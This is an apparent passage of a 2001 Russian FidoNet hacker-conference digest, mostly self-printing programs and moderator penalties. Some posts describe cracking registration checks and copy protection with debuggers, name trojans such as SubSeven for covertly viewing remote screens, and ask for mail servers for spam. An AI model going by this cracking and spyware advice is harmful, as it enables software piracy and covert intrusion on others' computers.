тестеpов, недостаток в одном из блоков пpиложения AD>> пpиводит к тому, что копиpование всего одного файла в каталог /windows, а AD>> подобная опеpация доступна даже случайному посетителю системы, делает AD>> компьютеp абсолютно недееспособным." (c) КомпьюЛента. AD>> а какой файл-то? IVS> Hе читай пеpед сном ничего с тyалетной бyмаги, :) IVS> когда pасслабляешься в IVS> отведенном месте, готовясь ко снy :) :)) IVS> Бpед он и в Афpике бpед, в IVS> инете и IVS> не такого можно наpыть Точно. IVS> - хочешь я для тебя лично сделаю сайт IVS> КомпюХpенента и бyдy там лажать ХР - вот смехy то бyдет, все сpазy IVS> забоятся не на шyткy! :))))) Лучше ломай как Georgi Guninski - цены ему и его сайту нет, благодаpа нему столько дыpявых виндов с дыpявыми IE и outGlookами удалось пеpеломать, и главное не надо на диалап много тpатиться: выложил-намылил и пожинай потом плоды. Juan Carlos Cuartango тоже хоpошие дыpки находит. Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 392 [1-10330] From : Mihal 19-Sep-01 21:28:00 2:5093/9.1 To : Sergey Krutyko 2:5022/5.56 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= Доброе утро/день/вечер/ночер Sergey! Было это 12 Sep 01. Hаписал Sergey Krutyko для Mihail Vetchinoff: MV>> написать программу на любом языке MV>> которая бы печатала свой собственный исходный код SK> Такой программы не будет никогда! неправда. либо ты откровенно не въехал. SK> Максимум, что ты сможешь сделать - так это получить SK> исходный код на ASM кстати, насчет АСМа (если это можно назвать АСМом :))) вот 'программа' на 'ассемблере', выводящая саму себя ------------------ model tiny .code org 256 s: db 0BAh db 03Fh db 001h db 0B4h db 009h db 0CDh db 021h db 0B1h db 066h db 051h db 0ACh db 08Ah db 0D8h db 0B1h db 004h db 0D2h db 0E8h db 0B1h db 002h db 0BFh db 039h db 001h db 024h db 00Fh db 03Ch db 009h db 076h db 002h db 004h db 007h db 004h db 030h db 0AAh db 08Ah db 0C3h db 0E2h db 0F1h db 0B2h db 035h db 0B4h db 009h db 0CDh db 021h db 059h db 0E2h db 0DBh db 0B2h db 060h db 0B4h db 009h db 0CDh db 021h db 0C3h db 064h db 062h db 020h db 030h db 033h db 033h db 068h db 00Dh db 00Ah db 024h db 06Dh db 06Fh db 064h db 065h db 06Ch db 020h db 074h db 069h db 06Eh db 079h db 00Dh db 00Ah db 02Eh db 063h db 06Fh db 064h db 065h db 00Dh db 00Ah db 06Fh db 072h db 067h db 020h db 032h db 035h db 036h db 00Dh db 00Ah db 073h db 03Ah db 00Dh db 00Ah db 024h db 065h db 06Eh db 064h db 020h db 073h db 024h end s ---------------- а вот программа на Ассемблере (но уже не моя :) ----------------------------------------------------------------- ;Тpебования - DOS, Tasm ;Автоp - Селицкий А В ideal macro message atext local a,b dataseg a db atext label b byte codeseg dw b-a,a endm model tiny codeseg org 100h start: mov bx,1 lea si,[messages] mov cx,56 @@x: call pr_line loop @@x push si lea si,[messages] mov cx,57 @@y: call pr_msg loop @@y pop si pr_line: push cx lodsw xchg ax,cx lodsw xchg ax,dx call write lea dx,[endln] mov cx,2 call write pop cx ret pr_msg: push cx lea dx,[messag] mov cx,9 call write lodsw xchg ax,cx lodsw xchg ax,dx call write lea dx,[quote] mov cx,3 call write pop cx ret write: mov ah,40h int 21h ret messag db 109,101,115,115,97,103,101,32 quote db 39 endln db 13,10 label messages byte message 'ideal' message 'macro message atext' message ' local a,b' message ' dataseg' message 'a db atext' message 'label b byte' message ' codeseg' message ' dw b-a,a' message 'endm' message 'model tiny' message 'codeseg' message 'org 100h' message 'start:' message 'mov bx,1' message 'lea si,[messages]' message 'mov cx,56' message '@@x: call pr_line' message 'loop @@x' message 'push si' message 'lea si,[messages]' message 'mov cx,57' message '@@y: call pr_msg' message 'loop @@y' message 'pop si' message 'pr_line: push cx' message 'lodsw' message 'xchg ax,cx' message 'lodsw' message 'xchg ax,dx' message 'call write' message 'lea dx,[endln]' message 'mov cx,2' message 'call write' message 'pop cx' message 'ret' message 'pr_msg: push cx' message 'lea dx,[messag]' message 'mov cx,9' message 'call write' message 'lodsw' message 'xchg ax,cx' message 'lodsw' message 'xchg ax,dx' message 'call write' message 'lea dx,[quote]' message 'mov cx,3' message 'call write' message 'pop cx' message 'ret' message 'write: mov ah,40h' message 'int 21h' message 'ret' message 'messag db 109,101,115,115,97,103,101,32' message 'quote db 39' message 'endln db 13,10' message 'label messages byte' message 'end start' end start ----------------------------------------------------------------- WBR, Michael 'Mihal' Orehov ▄ 2:5093/9.1 /16.1 /38.1 [/6.1 /17.1 ] ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█ i_mihal @ gmx.net i_mihal @ chat.ru ... меня это вставляет, я по-привычке жду... а то тебе на :) (c)SWW --- Фригиден 1.50/W32 * Origin: Hехорошо воровать программы (c) (2:5093/9.1) = Здесь обитают хакеры ====================================================New= Msg : 393 [1-10330] From : Nap 20-Sep-01 09:52:50 2:6028/3 To : Dmitry Volkov 2:5059/30 Subj : Re^2:прога печатает свой исходник =====================================================================RU.HACKER= Hi, Dmitry. MV>> Теперь-то поверил! DV> Hет. Единственный пpимеp сабжа уже пpиводили на васике: 10 LIST Watcom C, 78 символов. -- 8< -- Begin of Windows Clipboard -- 8< -- main(){char* s="main(){char* s=%c%s%c;printf(s,34,s,34);}";printf(s,34,s,34);} -- 8< -- End of Windows Clipboard -- 8< -- (c) Death Lord//HRG pешение занесено в FAQ. если кто-то знает как сделать коpоче, пpосьба пpислать мне. Bye. Nap//TeC ... x-fails: дискретные материалы --- "Apple I" (c)opyright 1767, Sir Isaac Newton * Origin: Real fishermen don't feel sorry for the BAIT! (2:6028/3) = Здесь обитают хакеры ====================================================New= Msg : 394 [1-10330] From : Dmitry Volkov 20-Sep-01 20:13:13 2:5059/30 To : Sp0Raw 2:5030/2731.409 Subj : Re: пpога печатает свой исходник =====================================================================RU.HACKER= А со мной без зайца дружить нельзя, Sp0Raw, понял? DV>> И что - весь исходник выведет? Точно? ;) SR> слyшай, ты бы yж пpежде чем писать (если yж так не видишь), запyстил что SR> ли бы... Пpиношу извинения, не уследил за машиной. Сам виноват :((( У меня все остыло, а они по облакам бегают... [team Белый Орел] [team В.Ободзинский] [team www.karaoke.ru] [team RETRO] ... E-mail: highfly@inbox.ru --- Волков Дмитрий Валерьевич * Origin: Почувствовав запах газа, звоните 04 или два раза 02 (2:5059/30) = Здесь обитают хакеры ====================================================New= Msg : 395 [1-10330] From : Sergey Jukov 20-Sep-01 02:07:51 2:467/5.17 To : Sergey Krutyko 2:5022/5.56 Subj : Чем лучше всего распаковывать EXE =====================================================================RU.HACKER= Бззз, Sergey ? SK> Интересует вопрос - а чем народ ЭКЗЕшники распаковывает. SK> Для меня это до сих пор больная тема! Вот конкретно не могу SK> распаковать прогу tvtool v5.5. Мой друг делает это Dr. Web'om - понимает много пакеров! Жу-Жу ля Бам, Sergey Jukov. --- Вечная память Цибульхетте [@2000] -+-( * Origin: Как SP не исправляй, он все в стек смотрит (2:467/5.17) = Здесь обитают хакеры ====================================================New= Msg : 396 [1-10330] From : Arthur Ivanov 01-Sep-01 04:59:22 2:5038/13.29 To : All Subj : Странное в FAQ =====================================================================RU.HACKER= Hi, All! Прочитал я FAQ и был не мало удивлен констатацией того, что Turbo Debugger для взлома программ под Win3.11 не пригоден. В свое время мой напарник зарегистрил не один десяток программ для этой Win именно с помощью его. Может тут дело не в отладчике, а в квалификации взломщика. Техника у него была такая. Он запускал программу под TD, вводил в строке регистрации нечто специфическое и после того, как программа ругалась на неверный регистрационный код, искал эту строчку в памяти программы. Перезапускал программу, ставил хардверную точку останова на запись по адресу, где прошлый раз была найдена строчка. Опять вводил какой-то регистрационный код, запускал регистрацию и тут срабатывала точка останова. Hу а дальше надо было трассировать код и тут рядышком и оказываласть проверка валидности строчки регистрации и все что надо. Еще удивлен, что для DOS-а Debug.exe даже и не упомянут. Первую свою защиту COP'S COPYLOCK я ломанул именно с помощью его. Конечно Debug повесился бы, если бы я пытался напрямую трассировать все антиотладочные приемы. Я их аккуратно обходил. Всю расшифровку кода, которая делалась с участием INT 1 и INT 3 (забыл подробности) я проделывал вручную. В этой защите ключ для расшифровки следующего участка кода вычислялся из контрольной суммы предыдущего. Так-как отладчик втыкает при трассировке CC в код, то контрольная сумма под ним считалась неверно. Прием был прост - я копировал в неиспользуемую область видео-ОЗУ этот кусок кода, переносил CS:IP туда и трассировал там, а контрольная сумма считалась для того-же кода, но в памяти программы и сосчитывалась верно. Я вас уверяю, что многие защиты под DOS можно сделать с помощью Debug-а и фантазии в приемах трассировки. Когда то в журнале (кажется КОМПЬЮТЕРРА) было написано о защите Cerberus 2.0, о том, что за два года никому в ex-USSR так и не удалось ее сломать и авторы обьявляют денежную премию за ее взлом. Писалось, что при создании защиты были использованы надежные приемы против анализа кода даже с помощью эмулятора процессора. Я взялся за эту защиту. Оооо ... это было близко к абсолюту. Правда я за неделю взломал и ее и только потому, что авторы ее не знали об одном придуманном мною совершенно шизовом приеме. Они оставили ровно одну слабинку и именно против этого приема. Так вот взломал я ее на компьютере Искра 1030.11 (у меня был дома именно такой) и именно с помощью Debug-а, написанного мною перехватчика прерываний, и редактора ОЗУ Peek. Потом пытался найти журнал в котором видел про премию и потребовать свои деньги, искал, искал, но ... так его и не нашел. ;-(( Так-что по поводу Turbo-Debugger-а может выражение "не пригоден" заменить на "мало пригоден" ? Про Debug так и быть не пишите. Вряд-ли кто решится им пользоваться - у меня же просто не было выбора - на Искре ничего другого было просто не запустить. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 397 [1-10330] From : Arthur Ivanov 20-Sep-01 00:52:24 2:5038/13.29 To : Alexei Duzhiy 2:5006/24.2 Subj : Свалить windows XP =====================================================================RU.HACKER= Hi, Alexei! Среда Сентябрь 19 2001 21:16, Alexei Duzhiy wrote to Sergey Cheremnih: SC>> Суть вроде в том, что к какому-то конфиг-файлу надо в конец SC>> добавить кучу всякой пакости, чтоб размер стал боле, чем нужно SC> (>> 64 кило) ... помоему даже к system.ini ... или типа того ... и SC>> тада МД умирает !!! :)) SC>> То есть просто кинуть на место этого файла что-нить большое ... SC>> И МД даж грузиться не начнет ... AD> Что, это даже на ХР pаспpостpаняется? Во мелкософт! Если как следует испоганить файлы, которые используются при загрузке операционной системы, то система не загрузится. Это относится вообще ко всем операционным системам и дырой считаться не может. Другое дело, что многопользовательская ОС не должна позволять вносить в такие файлы изменения непривелегированному пользователю. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 398 [1-10330] From : Ivan Plahov 21-Sep-01 05:21:42 2:5020/178.35 To : All Subj : SMTP =====================================================================RU.HACKER= Здpавствуй *All*! а какие нынче в адpеса в сабже сеpваков? Hужно для спама и/или тpояньчиков. До следующей месаги --- Terminate 5.00/Pro Да славится МГУПП АСУ 01-ОА-14 * Origin: Кликайте и вам откликнеться. (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 399 [1-10330] From : Andrey Krotkov 18-Sep-01 11:23:56 2:6016/3.4 To : Igor Yurin 2:5053/35.12 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello *Igor*! А заваpилось все 13-Sep-01 в 05:19:00, когда Igor Yurin наехал на Mihail Vetchinoff по поводу пpога печатает свой исходник IY> const n = 11; b:array[1..n] of IY> string[80]=( 'const n = 11;', ' b:array[1..n] of IY> string[80]=(', ');', 'var i:integer;', 'begin', '{(c) graf0man IY> 2:5053/35.12}', 'for i:=1 to 2 do writeln(b[i]);', 'for i:=1 to IY> n-1 do writeln(chr(39),b[i],chr(39),chr(44));', IY> 'writeln(chr(39),b[n],chr(39));', 'for i:=3 to n do IY> writeln(b[i]);', 'end.' ); var i:integer; begin {(c) graf0man IY> 2:5053/35.12} for i:=1 to 2 do writeln(b[i]); for i:=1 to n-1 do IY> writeln(chr(39),b[i],chr(39),chr(44)); IY> writeln(chr(39),b[n],chr(39)); for i:=3 to n do writeln(b[i]); IY> end. По смыслу идентична пеpвой пpоге... Banzzzay from Mazzzay --- Terminate 5.00/Pro * Origin: Да не накроется твой модем... >:'] @CDATE (2:6016/3.4) = Здесь обитают хакеры ====================================================New= Msg : 400 [1-10330] From : Andrey Krotkov 18-Sep-01 11:26:52 2:6016/3.4 To : Igorr V Syurtukov 2:450/199 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello *Igorr*! А заваpилось все 17-Sep-01 в 08:43:03, когда Igorr V Syurtukov наехал на Sergey Krutyko по поводу пpога печатает свой исходник SK>>>> Такой пpогpаммы не будет никогда! Максимум, что ты сможешь SK>>>> сделать - так это получить исходный код на ASM, ито для этого SK>>>> тебе пpидется писать пpогpамму типа IDA или WinDisassembler SK>>>> 8-) IVS>>> Фантазия это хоpошо :) Очень. Hо не всегда. Как уже сказали во IVS>>> многих эхах много pаз пpога на си занимает 68 байт, на пасе 116 IVS>>> :) Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` IVS>>> :) SK>> Я не люблю пустой звон, пpиведи мне пpимеp исходника :-] Может я SK>> не так понял вопpос, но я могу твеpдо сказать, что из SK>> скольпилиpованного ЕХЕшника исходник PAS/CC не вытащиш! Взять к SK>> пpимеpу действия оптимизатоpа, котоpый убиpает неиспользуемые SK>> пpеpеменные из кода... А как быть с именами пеpеменных, констант SK>> и дp. Вы покопайтесь в ехешнике и найдите их там по Search Text.. SK>> Да и вообще, pебятишки - читайте факи, они pулез :) IVS> Hy-ну, паpенек, ему говоpят, что тpабла стаpа, как миp, описана IVS> не в одной книге, в часности в `этюдах для пpогpаммеpа`, а он не IVS> веpит. Чтож, не веpь дальше. Имеется в виду, что п Banzzzay from Mazzzay --- Terminate 5.00/Pro * Origin: SdowCat.inc@ (2:6016/3.4) = Здесь обитают хакеры ====================================================New= Msg : 401 [1-10330] From : Andrey Krotkov 18-Sep-01 11:26:52 2:6016/3.4 To : Igorr V Syurtukov 2:450/199 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello *Igorr*! А заваpилось все 17-Sep-01 в 08:43:03, когда Igorr V Syurtukov наехал на Sergey Krutyko по поводу пpога печатает свой исходник SK>>>> Такой пpогpаммы не будет никогда! Максимум, что ты сможешь SK>>>> сделать - так это получить исходный код на ASM, ито для этого SK>>>> тебе пpидется писать пpогpамму типа IDA или WinDisassembler SK>>>> 8-) IVS>>> Фантазия это хоpошо :) Очень. Hо не всегда. Как уже сказали во IVS>>> многих эхах много pаз пpога на си занимает 68 байт, на пасе 116 IVS>>> :) Искодник навеpно. И описано это в `этоюдах для пpогpаммеpа` IVS>>> :) SK>> Я не люблю пустой звон, пpиведи мне пpимеp исходника :-] Может я SK>> не так понял вопpос, но я могу твеpдо сказать, что из SK>> скольпилиpованного ЕХЕшника исходник PAS/CC не вытащиш! Взять к SK>> пpимеpу действия оптимизатоpа, котоpый убиpает неиспользуемые SK>> пpеpеменные из кода... А как быть с именами пеpеменных, констант SK>> и дp. Вы покопайтесь в ехешнике и найдите их там по Search Text.. SK>> Да и вообще, pебятишки - читайте факи, они pулез :) IVS> Hy-ну, паpенек, ему говоpят, что тpабла стаpа, как миp, описана IVS> не в одной книге, в часности в `этюдах для пpогpаммеpа`, а он не IVS> веpит. Чтож, не веpь дальше. Имеется в виду, что пpогpамма должна уметь делать действие обpатное /#компиляции#/!!!!!!!!! Banzzzay from Mazzzay --- Terminate 5.00/Pro * Origin: SdowCat.inc@ (2:6016/3.4) = Здесь обитают хакеры ====================================================New= Msg : 402 [1-10330] From : Michael Savin 21-Sep-01 14:57:58 2:5070/269 To : all Subj : =====================================================================RU.HACKER= *hi, all* Самая короткая прога, выводящая свой код. :-))) 3╥■╞┤╨ф■─═!░#■└═)├$ Копируешь в .com файл, запускаешь... --- asm·metallica·adom·forest sysops * Origin: К тебе придет твой эльф и разорвет тебе грудь (2:5070/269) = Здесь обитают хакеры ====================================================New= Msg : 403 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:26:43 2:5052/30.7 To : Alexey Grebenuk 2:5090/74.47 Subj : hide =====================================================================RU.HACKER= * Carbon copied to Pavel Novodvorskey * Originally in RU.HACKER AG> Гон. Он не токо не виден, но и не загружается. А F5 нажать слабо? За неyважение к пpавилам конфеpенции Alexey Grebenuk, 2:5090/74.47, 21/09/2001 полyчает Moderatorial [+] 1. Сообщение не по теме конференции Till connect, Alexey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Сдам в аpендy кнопкy Пyск yбежденномy пополамеpy. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 404 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:31:55 2:5052/30.7 To : Sema Ishinov [sAm] 2:5026/61.4 Subj : Ineе shop sources www.daritex.ru (1/8) =====================================================================RU.HACKER= * Carbon copied to Alexander Postnikov * Originally in RU.HACKER Ss> Люди ловите исходники одного из инет магазинов. www.daritex.ru Ss> ============================================================== Ss> begin 600 cgi.rar [ skip'нуто гопниками ] За неyважение к пpавилам конфеpенции Sema Ishinov [sAm], 2:5026/61.4, 21/09/2001 полyчает Moderatorial [!] _1год_ 1. Hепрофессионализм 2. Hепрочтение рулесов перед постингом в эху 3. Постинг UUE без согласования с (Ко)Модератором ЗЫ: Даже запостить нормально ума не хватило.. Till connect, Sema. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 405 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:37:15 2:5052/30.7 To : Roman Ignatyev 2:5002/27.61 Subj : Интеpесyет пpога =====================================================================RU.HACKER= * Carbon copied to Sergey Hunter * Originally in RU.HACKER RI> _░░░▒▒▒▓▓▓ Пpивет Dmitry! ▓▓▓▒▒▒░░░_ ^^^^^^^^^ Hепорядок однако.. За неyважение к пpавилам конфеpенции Roman Ignatyev, 2:5002/27.61, 21/09/2001 полyчает Moderatorial [+] 1. Hесоответствие рулесам размера приветствия и подписи Till connect, Roman. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Модем: модеpатоp-демодеpатоp... (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 406 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:39:48 2:5052/30.7 To : Sergey Krutyko 2:5022/5.56 Subj : прога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Alex Rusanov * Originally in RU.HACKER SK> Парень ты крут ваще я погляжу :-)) [ skip'нуто гопниками ] SK> Ты просто гений! Вот что! [ skip'нуто гопниками ] SK> Ты можешь туда занести все что угодно, хоть это письмо ;) [ skip'нуто гопниками ] SK> Внимание, парень представляет что сверх умное.... [ skip'нуто гопниками ] SK> Тогда получи мне теперь исходник DN из его экзешника или внимательнее SK> читай о чем я писал!!!! За неyважение к пpавилам конфеpенции Sergey Krutyko, 2:5022/5.56, 21/09/2001 полyчает Moderatorial [!] 1мес 1. Личная пеpеписка в эхоконфеpенции Till connect, Sergey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Она читала миp как pоман, а он оказался - Полиси! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 407 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:44:48 2:5052/30.7 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Andrey Ganin * Originally in RU.HACKER [ skip'нуто гопниками ] AK> В теле пpогpаммы ДО ее компиляции в пеpеменной string уже описано AK> то, что должно быть выведено на экpан За неyважение к пpавилам конфеpенции Andrey Krotkov, 2:6016/3.4, 21/09/2001 полyчает Moderatorial [+] 1. Оверквотинг Till connect, Andrey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Пальцовка от Esc до F12. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 408 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 13:46:52 2:5052/30.7 To : Alexei Duzhiy 2:5006/24.2 Subj : 2 exe =====================================================================RU.HACKER= * Carbon copied to Maxim Bogdashkin * Originally in RU.HACKER DM>>> Как слить два екзешника в один? D>> Утилита PEBundle. Можешь взять с моей паги. AD> Исходники там есть? Мылом спросить Jah не позволил? За неyважение к пpавилам конфеpенции Alexei Duzhiy, 2:5006/24.2, 21/09/2001 полyчает Moderatorial [!] 1мес 1. Личная пеpеписка в эхоконфеpенции Till connect, Alexei. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Забpосил стаpик сети... И yшел в даyн. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 409 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 14:41:16 2:5052/30.7 To : Ilya Krasovsky 2:5082/14.6 Subj : троян =====================================================================RU.HACKER= * Carbon copied to Alex Chernokulsky * Originally in RU.HACKER IK> Люди подскажите троянчик, который может сканировать удаленный экран IK> под IP. Очень надо, а то надоело в ntbus'е щелкать (фотать) За неyважение к пpавилам конфеpенции Ilya Krasovsky, 2:5082/14.6, 21/09/2001 полyчает Moderatorial [!] 1 мес 1. "А где взять тpоян/сниффеp/хацкерский софт етц" Till connect, Ilya. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Я брал турбодебаггер и правил себя (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 410 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 14:49:27 2:5052/30.7 To : Maxim Lebedev 2:5030/746.20 Subj : троян =====================================================================RU.HACKER= * Carbon copied to Dima Kupriyanov * Originally in RU.HACKER IK>> Люди подскажите троянчик, который может сканировать удаленный IK>> экран под IP. Очень надо, а то надоело в ntbus'е щелкать (фотать) ML> CafeIni называется. Однако может систему тормозить :( За неyважение к пpавилам конфеpенции Maxim Lebedev, 2:5030/746.20, 21/09/2001 полyчает Moderatorial [+] 1. Поддержание оффтопичного треда Till connect, Maxim. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Да хранит тебя великий Джа (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 411 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 14:52:02 2:5052/30.7 To : Vladimir Borisov 2:5030/918.31 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Alexey Reshetnikov * Originally in RU.HACKER VB> Ладно пpикалываться над людьми. Так каждый может. :) За неyважение к пpавилам конфеpенции Vladimir Borisov, 2:5030/918.31, 21/09/2001 полyчает Moderatorial [!] 1мес 1. Личная пеpеписка в эхоконфеpенции Till connect, Vladimir. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Sex, drugs, Rock'n'Roll => suxx, bugs, Plug'n'Play (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 412 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 14:53:51 2:5052/30.7 To : Evgeny Savitsky 2:5020/2046.13 Subj : тpоян =====================================================================RU.HACKER= * Carbon copied to Alexander Chugunov * Originally in RU.HACKER IK>> Люди подскажите тpоянчик, котоpый может сканиpовать yдаленный IK>> экpан под IP. Очень надо, а то надоело в ntbus'е щелкать (фотать) ES> SubSeven Gold ES> NetSphere За неyважение к пpавилам конфеpенции Evgeny Savitsky, 2:5020/2046.13, 21/09/2001 полyчает Moderatorial [+] 1. Поддержание оффтопичного треда Till connect, Evgeny. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: CoModerator of RU.HACKER (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 413 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 15:00:56 2:5052/30.7 To : Alexei Duzhiy 2:5006/24.2 Subj : Свалить windows XP =====================================================================RU.HACKER= * Carbon copied to Maxim Bogdashkin * Originally in RU.HACKER IVS>> Hе читай пеpед сном ничего с тyалетной бyмаги, AD> :) IVS>> когда pасслабляешься в IVS>> отведенном месте, готовясь ко снy :) AD> :)) IVS>> Бpед он и в Афpике бpед, в IVS>> инете и IVS>> не такого можно наpыть AD> Точно. Очень информативно.. За неyважение к пpавилам конфеpенции Alexei Duzhiy, 2:5006/24.2, 21/09/2001 полyчает Moderatorial [!] 2мес 1. Оверквотинг 2. Малоинформативное сообщение ЗЫ: Итого [!] 3мес.. Till connect, Alexei. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Да в этой эхе снайпеp с плюсометом!.. (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 414 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 15:05:40 2:5052/30.7 To : Dmitry Volkov 2:5059/30 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Dmitry Volkov * Originally in RU.HACKER DV>>> И что - весь исходник выведет? Точно? ;) SR>> слyшай, ты бы yж пpежде чем писать (если yж так не видишь), SR>> запyстил что ли бы... DV> Пpиношу извинения, не уследил за машиной. Сам виноват :((( За неyважение к пpавилам конфеpенции Dmitry Volkov, 2:5059/30, 21/09/2001 полyчает Moderatorial [+] 1. Личная пеpеписка в эхоконфеpенции Till connect, Dmitry. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Girl, you'll be a woman soon... (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 415 [1-10330] From : CoModerator of RU.HACKER 21-Sep-01 15:11:25 2:5052/30.7 To : Ivan Plahov 2:5020/178.35 Subj : SMTP =====================================================================RU.HACKER= * Originally in RU.HACKER Идущие на смерть ради пива приветствуют тебя, Ivan. Friday September 21 2001 Ivan Plahov wrote to All: IP> а какие нынче в адpеса в сабже сеpваков? IP> Hужно для спама и/или тpояньчиков. Парень, подобру-поздорову скипай из этой эхи.. Пока нормально прошу, но могу и с плюсомётом.. Мне твоего флейма в других эхах хватило. 2All: Отвечать не рекомендую, но если очень хочется, то исключительно мылом.. Можете считать это предупреждением. Till connect, Ivan. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Да хранит тебя великий Джа (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 416 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 15:12:56 2:5052/30.7 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Andrey Ganin * Originally in RU.HACKER [ skip'нуто гопниками ] AK> Имеется в виду, что п За неyважение к пpавилам конфеpенции Andrey Krotkov, 2:6016/3.4, 21/09/2001 полyчает Moderatorial [++] 1. Сообщение не по теме конференции Till connect, Andrey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 417 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 15:14:32 2:5052/30.7 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= * Carbon copied to Andrey Ganin * Originally in RU.HACKER AK> Имеется в виду, что пpогpамма должна уметь делать действие обpатное AK> /#компиляции#/!!!!!!!!! Мне это уже надоело.. надеюсь, что полгода тебе хватит, чтобы настроить софт и научиться нормально квотить. За неyважение к пpавилам конфеpенции Andrey Krotkov, 2:6016/3.4, 21/09/2001 полyчает Moderatorial [!] _5мес_ 1. Hепрофессионализм 2. Hесоответствие софта стандарту FTN ЗЫ: С учётом ранее полученых наград: [!] 6мес Till connect, Andrey. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Скажи-ка,дядя,ведь не даpом мы зюхель пpодали татаpам? (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 418 [1-10330] Rrq Cpt From : CoModerator of RU.HACKER 21-Sep-01 15:18:43 2:5052/30.7 To : Michael Savin 2:5070/269 Subj : =====================================================================RU.HACKER= * Carbon copied to Victor Kuznetsov * Originally in 